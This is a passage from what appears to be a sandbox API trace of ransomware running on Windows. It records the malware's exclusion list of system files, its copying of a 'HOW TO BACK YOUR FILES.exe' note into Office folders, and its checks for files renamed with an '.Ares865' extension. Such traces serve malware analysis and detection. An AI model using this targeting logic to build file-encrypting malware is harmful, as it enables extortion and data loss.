lpString2="MSBuild") returned -1 [0090.270] lstrlenW (lpString="1036") returned 4 [0090.270] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\*") returned 65 [0090.270] lstrcpyW (in: lpString1=0x2cce480, lpString2="1036" | out: lpString1="1036") returned="1036" [0090.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0090.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8a) returned 0x320fc8 [0090.270] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0090.270] lstrcmpiW (lpString1="3082", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.270] lstrcmpiW (lpString1="3082", lpString2="aoldtz.exe") returned -1 [0090.270] lstrcmpiW (lpString1="3082", lpString2=".") returned 1 [0090.270] lstrcmpiW (lpString1="3082", lpString2="..") returned 1 [0090.270] lstrcmpiW (lpString1="3082", lpString2="windows") returned -1 [0090.270] lstrcmpiW (lpString1="3082", lpString2="bootmgr") returned -1 [0090.270] lstrcmpiW (lpString1="3082", lpString2="temp") returned -1 [0090.270] lstrcmpiW (lpString1="3082", lpString2="pagefile.sys") returned -1 [0090.270] lstrcmpiW (lpString1="3082", lpString2="boot") returned -1 [0090.270] lstrcmpiW (lpString1="3082", lpString2="ids.txt") returned -1 [0090.270] lstrcmpiW (lpString1="3082", lpString2="ntuser.dat") returned -1 [0090.270] lstrcmpiW (lpString1="3082", lpString2="perflogs") returned -1 [0090.270] lstrcmpiW (lpString1="3082", lpString2="MSBuild") returned -1 [0090.270] lstrlenW (lpString="3082") returned 4 [0090.270] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\1036") returned 68 [0090.270] lstrcpyW (in: lpString1=0x2cce480, lpString2="3082" | out: lpString1="3082") returned="3082" [0090.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0090.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8a) returned 0x321060 [0090.270] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0090.270] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.270] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082" [0090.270] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x321060 | out: hHeap=0x2b0000) returned 1 [0090.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0090.271] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082") returned 68 [0090.271] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082" [0090.271] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.271] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\office\\uicaptions\\3082\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.271] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.272] GetLastError () returned 0x0 [0090.272] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.272] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.272] CloseHandle (hObject=0x120) returned 1 [0090.272] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.272] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.272] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x65a20f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x65a20f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.272] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.272] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.272] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.272] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.272] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.272] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.272] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.272] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.272] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.Ares865", lpString2="aoldtz.exe") returned 1 [0090.272] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.Ares865", lpString2=".") returned 1 [0090.272] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.Ares865", lpString2="..") returned 1 [0090.273] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.Ares865", lpString2="windows") returned -1 [0090.273] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.Ares865", lpString2="bootmgr") returned 1 [0090.273] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.Ares865", lpString2="temp") returned -1 [0090.273] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.Ares865", lpString2="pagefile.sys") returned -1 [0090.273] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.Ares865", lpString2="boot") returned 1 [0090.273] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.Ares865", lpString2="ids.txt") returned -1 [0090.273] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.Ares865", lpString2="ntuser.dat") returned -1 [0090.273] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.Ares865", lpString2="perflogs") returned -1 [0090.273] lstrcmpiW (lpString1="ENVELOPR.DLL.trx_dll.Ares865", lpString2="MSBuild") returned -1 [0090.273] lstrlenW (lpString="ENVELOPR.DLL.trx_dll.Ares865") returned 28 [0090.273] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082\\*") returned 70 [0090.273] lstrcpyW (in: lpString1=0x2cce48a, lpString2="ENVELOPR.DLL.trx_dll.Ares865" | out: lpString1="ENVELOPR.DLL.trx_dll.Ares865") returned="ENVELOPR.DLL.trx_dll.Ares865" [0090.273] lstrlenW (lpString="ENVELOPR.DLL.trx_dll.Ares865") returned 28 [0090.273] lstrlenW (lpString="Ares865") returned 7 [0090.273] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.273] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.273] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.Ares865", lpString2="aoldtz.exe") returned 1 [0090.273] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.Ares865", lpString2=".") returned 1 [0090.273] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.Ares865", lpString2="..") returned 1 [0090.273] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.Ares865", lpString2="windows") returned -1 [0090.273] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.Ares865", lpString2="bootmgr") returned 1 [0090.273] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.Ares865", lpString2="temp") returned -1 [0090.273] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.Ares865", lpString2="pagefile.sys") returned -1 [0090.273] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.Ares865", lpString2="boot") returned 1 [0090.273] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.Ares865", lpString2="ids.txt") returned -1 [0090.273] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.Ares865", lpString2="ntuser.dat") returned -1 [0090.273] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.Ares865", lpString2="perflogs") returned -1 [0090.273] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll.Ares865", lpString2="MSBuild") returned -1 [0090.273] lstrlenW (lpString="GRINTL32.DLL.trx_dll.Ares865") returned 28 [0090.273] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.Ares865") returned 97 [0090.273] lstrcpyW (in: lpString1=0x2cce48a, lpString2="GRINTL32.DLL.trx_dll.Ares865" | out: lpString1="GRINTL32.DLL.trx_dll.Ares865") returned="GRINTL32.DLL.trx_dll.Ares865" [0090.273] lstrlenW (lpString="GRINTL32.DLL.trx_dll.Ares865") returned 28 [0090.273] lstrlenW (lpString="Ares865") returned 7 [0090.273] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.274] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.274] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.Ares865", lpString2="aoldtz.exe") returned 1 [0090.274] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.Ares865", lpString2=".") returned 1 [0090.274] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.Ares865", lpString2="..") returned 1 [0090.274] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.Ares865", lpString2="windows") returned -1 [0090.274] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.Ares865", lpString2="bootmgr") returned 1 [0090.274] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.Ares865", lpString2="temp") returned -1 [0090.274] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.Ares865", lpString2="pagefile.sys") returned -1 [0090.274] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.Ares865", lpString2="boot") returned 1 [0090.274] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.Ares865", lpString2="ids.txt") returned -1 [0090.274] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.Ares865", lpString2="ntuser.dat") returned -1 [0090.274] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.Ares865", lpString2="perflogs") returned -1 [0090.274] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll.Ares865", lpString2="MSBuild") returned -1 [0090.274] lstrlenW (lpString="GRINTL32.REST.trx_dll.Ares865") returned 29 [0090.274] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.Ares865") returned 97 [0090.274] lstrcpyW (in: lpString1=0x2cce48a, lpString2="GRINTL32.REST.trx_dll.Ares865" | out: lpString1="GRINTL32.REST.trx_dll.Ares865") returned="GRINTL32.REST.trx_dll.Ares865" [0090.274] lstrlenW (lpString="GRINTL32.REST.trx_dll.Ares865") returned 29 [0090.274] lstrlenW (lpString="Ares865") returned 7 [0090.274] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.274] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.274] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.274] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.Ares865", lpString2="aoldtz.exe") returned 1 [0090.274] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.Ares865", lpString2=".") returned 1 [0090.274] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.Ares865", lpString2="..") returned 1 [0090.274] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.Ares865", lpString2="windows") returned -1 [0090.274] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.Ares865", lpString2="bootmgr") returned 1 [0090.274] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.Ares865", lpString2="temp") returned -1 [0090.274] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.Ares865", lpString2="pagefile.sys") returned -1 [0090.274] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.Ares865", lpString2="boot") returned 1 [0090.274] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.Ares865", lpString2="ids.txt") returned 1 [0090.274] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.Ares865", lpString2="ntuser.dat") returned -1 [0090.274] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.Ares865", lpString2="perflogs") returned -1 [0090.275] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll.Ares865", lpString2="MSBuild") returned -1 [0090.275] lstrlenW (lpString="MAPIR.DLL.trx_dll.Ares865") returned 25 [0090.275] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.Ares865") returned 98 [0090.275] lstrcpyW (in: lpString1=0x2cce48a, lpString2="MAPIR.DLL.trx_dll.Ares865" | out: lpString1="MAPIR.DLL.trx_dll.Ares865") returned="MAPIR.DLL.trx_dll.Ares865" [0090.275] lstrlenW (lpString="MAPIR.DLL.trx_dll.Ares865") returned 25 [0090.275] lstrlenW (lpString="Ares865") returned 7 [0090.275] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.275] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.275] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.Ares865", lpString2="aoldtz.exe") returned 1 [0090.275] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.Ares865", lpString2=".") returned 1 [0090.275] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.Ares865", lpString2="..") returned 1 [0090.275] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.Ares865", lpString2="windows") returned -1 [0090.275] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.Ares865", lpString2="bootmgr") returned 1 [0090.275] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.Ares865", lpString2="temp") returned -1 [0090.275] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.Ares865", lpString2="pagefile.sys") returned -1 [0090.275] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.Ares865", lpString2="boot") returned 1 [0090.275] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.Ares865", lpString2="ids.txt") returned 1 [0090.275] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.Ares865", lpString2="ntuser.dat") returned -1 [0090.275] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.Ares865", lpString2="perflogs") returned -1 [0090.275] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll.Ares865", lpString2="MSBuild") returned -1 [0090.275] lstrlenW (lpString="MOR6INT.REST.trx_dll.Ares865") returned 28 [0090.275] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.Ares865") returned 94 [0090.275] lstrcpyW (in: lpString1=0x2cce48a, lpString2="MOR6INT.REST.trx_dll.Ares865" | out: lpString1="MOR6INT.REST.trx_dll.Ares865") returned="MOR6INT.REST.trx_dll.Ares865" [0090.275] lstrlenW (lpString="MOR6INT.REST.trx_dll.Ares865") returned 28 [0090.275] lstrlenW (lpString="Ares865") returned 7 [0090.275] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.275] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.275] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.Ares865", lpString2="aoldtz.exe") returned 1 [0090.275] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.Ares865", lpString2=".") returned 1 [0090.275] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.Ares865", lpString2="..") returned 1 [0090.275] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.Ares865", lpString2="windows") returned -1 [0090.275] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.Ares865", lpString2="bootmgr") returned 1 [0090.275] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.Ares865", lpString2="temp") returned -1 [0090.275] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.Ares865", lpString2="pagefile.sys") returned -1 [0090.276] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.Ares865", lpString2="boot") returned 1 [0090.276] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.Ares865", lpString2="ids.txt") returned 1 [0090.276] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.Ares865", lpString2="ntuser.dat") returned -1 [0090.276] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.Ares865", lpString2="perflogs") returned -1 [0090.276] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll.Ares865", lpString2="MSBuild") returned 1 [0090.276] lstrlenW (lpString="MSOINTL.DLL.trx_dll.Ares865") returned 27 [0090.276] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.Ares865") returned 97 [0090.276] lstrcpyW (in: lpString1=0x2cce48a, lpString2="MSOINTL.DLL.trx_dll.Ares865" | out: lpString1="MSOINTL.DLL.trx_dll.Ares865") returned="MSOINTL.DLL.trx_dll.Ares865" [0090.276] lstrlenW (lpString="MSOINTL.DLL.trx_dll.Ares865") returned 27 [0090.276] lstrlenW (lpString="Ares865") returned 7 [0090.276] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.276] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.276] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.Ares865", lpString2="aoldtz.exe") returned 1 [0090.276] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.Ares865", lpString2=".") returned 1 [0090.276] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.Ares865", lpString2="..") returned 1 [0090.276] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.Ares865", lpString2="windows") returned -1 [0090.276] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.Ares865", lpString2="bootmgr") returned 1 [0090.276] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.Ares865", lpString2="temp") returned -1 [0090.276] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.Ares865", lpString2="pagefile.sys") returned -1 [0090.276] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.Ares865", lpString2="boot") returned 1 [0090.276] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.Ares865", lpString2="ids.txt") returned 1 [0090.276] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.Ares865", lpString2="ntuser.dat") returned -1 [0090.276] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.Ares865", lpString2="perflogs") returned -1 [0090.276] lstrcmpiW (lpString1="MSOINTL.REST.trx_dll.Ares865", lpString2="MSBuild") returned 1 [0090.276] lstrlenW (lpString="MSOINTL.REST.trx_dll.Ares865") returned 28 [0090.276] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.Ares865") returned 96 [0090.276] lstrcpyW (in: lpString1=0x2cce48a, lpString2="MSOINTL.REST.trx_dll.Ares865" | out: lpString1="MSOINTL.REST.trx_dll.Ares865") returned="MSOINTL.REST.trx_dll.Ares865" [0090.276] lstrlenW (lpString="MSOINTL.REST.trx_dll.Ares865") returned 28 [0090.276] lstrlenW (lpString="Ares865") returned 7 [0090.276] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.276] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.276] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.Ares865", lpString2="aoldtz.exe") returned 1 [0090.276] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.Ares865", lpString2=".") returned 1 [0090.277] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.Ares865", lpString2="..") returned 1 [0090.277] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.Ares865", lpString2="windows") returned -1 [0090.277] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.Ares865", lpString2="bootmgr") returned 1 [0090.277] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.Ares865", lpString2="temp") returned -1 [0090.277] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.Ares865", lpString2="pagefile.sys") returned -1 [0090.277] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.Ares865", lpString2="boot") returned 1 [0090.277] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll.Ares865", lpString2="ids.txt") returned 1 [0090.277] lstrcpyW (in: lpString1=0x2cce48a, lpString2="OMSINTL.DLL.trx_dll.Ares865" | out: lpString1="OMSINTL.DLL.trx_dll.Ares865") returned="OMSINTL.DLL.trx_dll.Ares865" [0090.277] lstrlenW (lpString="OMSINTL.DLL.trx_dll.Ares865") returned 27 [0090.277] lstrlenW (lpString="Ares865") returned 7 [0090.277] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.277] lstrcpyW (in: lpString1=0x2cce48a, lpString2="ONINTL.DLL.trx_dll.Ares865" | out: lpString1="ONINTL.DLL.trx_dll.Ares865") returned="ONINTL.DLL.trx_dll.Ares865" [0090.277] lstrlenW (lpString="ONINTL.DLL.trx_dll.Ares865") returned 26 [0090.277] lstrlenW (lpString="Ares865") returned 7 [0090.277] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.277] lstrcpyW (in: lpString1=0x2cce48a, lpString2="ONINTL.REST.trx_dll.Ares865" | out: lpString1="ONINTL.REST.trx_dll.Ares865") returned="ONINTL.REST.trx_dll.Ares865" [0090.277] lstrlenW (lpString="ONINTL.REST.trx_dll.Ares865") returned 27 [0090.277] lstrlenW (lpString="Ares865") returned 7 [0090.277] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.277] lstrcpyW (in: lpString1=0x2cce48a, lpString2="OUTLLIBR.DLL.trx_dll.Ares865" | out: lpString1="OUTLLIBR.DLL.trx_dll.Ares865") returned="OUTLLIBR.DLL.trx_dll.Ares865" [0090.277] lstrlenW (lpString="OUTLLIBR.DLL.trx_dll.Ares865") returned 28 [0090.277] lstrlenW (lpString="Ares865") returned 7 [0090.277] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.277] lstrcpyW (in: lpString1=0x2cce48a, lpString2="OUTLLIBR.REST.trx_dll.Ares865" | out: lpString1="OUTLLIBR.REST.trx_dll.Ares865") returned="OUTLLIBR.REST.trx_dll.Ares865" [0090.277] lstrlenW (lpString="OUTLLIBR.REST.trx_dll.Ares865") returned 29 [0090.278] lstrlenW (lpString="Ares865") returned 7 [0090.278] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.278] lstrcpyW (in: lpString1=0x2cce48a, lpString2="OUTLWVW.DLL.trx_dll.Ares865" | out: lpString1="OUTLWVW.DLL.trx_dll.Ares865") returned="OUTLWVW.DLL.trx_dll.Ares865" [0090.278] lstrlenW (lpString="OUTLWVW.DLL.trx_dll.Ares865") returned 27 [0090.278] lstrlenW (lpString="Ares865") returned 7 [0090.278] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.278] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PPINTL.DLL.trx_dll.Ares865" | out: lpString1="PPINTL.DLL.trx_dll.Ares865") returned="PPINTL.DLL.trx_dll.Ares865" [0090.278] lstrlenW (lpString="PPINTL.DLL.trx_dll.Ares865") returned 26 [0090.278] lstrlenW (lpString="Ares865") returned 7 [0090.278] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.278] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PPINTL.REST.trx_dll.Ares865" | out: lpString1="PPINTL.REST.trx_dll.Ares865") returned="PPINTL.REST.trx_dll.Ares865" [0090.278] lstrlenW (lpString="PPINTL.REST.trx_dll.Ares865") returned 27 [0090.278] lstrlenW (lpString="Ares865") returned 7 [0090.278] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.278] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PUB6INTL.DLL.trx_dll.Ares865" | out: lpString1="PUB6INTL.DLL.trx_dll.Ares865") returned="PUB6INTL.DLL.trx_dll.Ares865" [0090.278] lstrlenW (lpString="PUB6INTL.DLL.trx_dll.Ares865") returned 28 [0090.278] lstrlenW (lpString="Ares865") returned 7 [0090.278] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.278] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PUB6INTL.REST.trx_dll.Ares865" | out: lpString1="PUB6INTL.REST.trx_dll.Ares865") returned="PUB6INTL.REST.trx_dll.Ares865" [0090.278] lstrlenW (lpString="PUB6INTL.REST.trx_dll.Ares865") returned 29 [0090.278] lstrlenW (lpString="Ares865") returned 7 [0090.278] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.278] lstrcpyW (in: lpString1=0x2cce48a, lpString2="PUBWZINT.REST.trx_dll.Ares865" | out: lpString1="PUBWZINT.REST.trx_dll.Ares865") returned="PUBWZINT.REST.trx_dll.Ares865" [0090.278] lstrlenW (lpString="PUBWZINT.REST.trx_dll.Ares865") returned 29 [0090.278] lstrlenW (lpString="Ares865") returned 7 [0090.279] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.279] lstrcpyW (in: lpString1=0x2cce48a, lpString2="SGRES.DLL.trx_dll.Ares865" | out: lpString1="SGRES.DLL.trx_dll.Ares865") returned="SGRES.DLL.trx_dll.Ares865" [0090.279] lstrlenW (lpString="SGRES.DLL.trx_dll.Ares865") returned 25 [0090.279] lstrlenW (lpString="Ares865") returned 7 [0090.279] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.279] lstrcpyW (in: lpString1=0x2cce48a, lpString2="STINTL.DLL.trx_dll.Ares865" | out: lpString1="STINTL.DLL.trx_dll.Ares865") returned="STINTL.DLL.trx_dll.Ares865" [0090.279] lstrlenW (lpString="STINTL.DLL.trx_dll.Ares865") returned 26 [0090.279] lstrlenW (lpString="Ares865") returned 7 [0090.279] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.279] lstrcpyW (in: lpString1=0x2cce48a, lpString2="VISBRRES.DLL.trx_dll.Ares865" | out: lpString1="VISBRRES.DLL.trx_dll.Ares865") returned="VISBRRES.DLL.trx_dll.Ares865" [0090.279] lstrlenW (lpString="VISBRRES.DLL.trx_dll.Ares865") returned 28 [0090.279] lstrlenW (lpString="Ares865") returned 7 [0090.279] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.279] lstrcpyW (in: lpString1=0x2cce48a, lpString2="VISINTL.DLL.trx_dll.Ares865" | out: lpString1="VISINTL.DLL.trx_dll.Ares865") returned="VISINTL.DLL.trx_dll.Ares865" [0090.279] lstrlenW (lpString="VISINTL.DLL.trx_dll.Ares865") returned 27 [0090.279] lstrlenW (lpString="Ares865") returned 7 [0090.279] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.279] lstrcpyW (in: 